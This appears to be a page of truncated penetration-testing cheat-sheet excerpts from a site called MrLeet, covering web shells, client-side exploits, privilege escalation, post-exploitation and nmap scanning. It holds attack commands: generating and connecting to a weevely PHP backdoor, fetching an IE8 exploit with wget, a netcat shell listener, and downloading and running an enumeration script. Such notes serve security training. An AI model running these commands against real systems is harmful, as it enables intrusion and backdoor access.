Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.



Web Shag Web Application Vulnerability Assessment Platform
webshag-gui

Web Shells
http://tools.kali.org/maintaining-access/webshells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t

...




Client Attacks

MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start

JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.

Linux Client Shells
http://www....




Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:

whoami

net user "%username%"

Try the getsystem command using meterpreter - rarely works but is worth a try.

...




Defacto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
id
sudo su

Here are the commands I have learned to use to perform Linux enumeration and privilege escal...




Post exploitation refers to the actions performed by an attacker once some level of control has been gained over the target.

Simple Local Web Servers

Run a basic HTTP server (Python 2), great for serving up shells etc.
python -m SimpleHTTPServer 80

Run a basic Python 3 HTTP server, great for serving up shells etc.
...




Netcat Shell Listener

nc -nlvp 4444

Spawning a TTY Shell - Break out of jail or a limited shell. You should almost always upgrade your shell after taking control of an apache or www user.

(For example, when you encounter the error message "sh: no job control in this shell" while trying to run an exploit.)

(hint: sudo -l to s...






DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

Nmap Fuzzers:

NMap Fuzzer List
https://nmap.org/nsedoc/categories/fuzzer.html

NMap HTTP Form Fuzzer
nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/regis...




File Enumeration

Find SUID (UID 0 / root execution) and SGID files

/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Get handy Linux file system enumeration script (run from /var/tmp)
wget https://highon.coffee/downloads/linux-local-enum.sh
chmod +x ./linux-local-enum.sh
./linux-lo...




Nmap Exploit Scripts
https://nmap.org/nsedoc/categories/exploit.html

Nmap search through vulnerability scripts
cd /usr/share/nmap/scripts/
ls -l *vuln*

Nmap search through Nmap scripts for a specific keyword
ls /usr/share/nmap/scripts/* | grep ftp

Scan for vulnerable exploits with nmap
nmap --script e...




Port Scanning
Subnet Reference Table

Prefix   Addresses   Usable Hosts   Netmask            Fraction of a Class C
/30      4           2              255.255.255.252    1/64
/29      8           6              255.255.255.248    1/32
/28      16          14             255.255.255.240    1/16
/27      32          30             255.255.255.224    1/8
/26      64          62             255.255.255.192    1/4
/25      128         126            255.255.255.128    1/2
/24      256         254            255.255.255.0      1
/23      512         51...

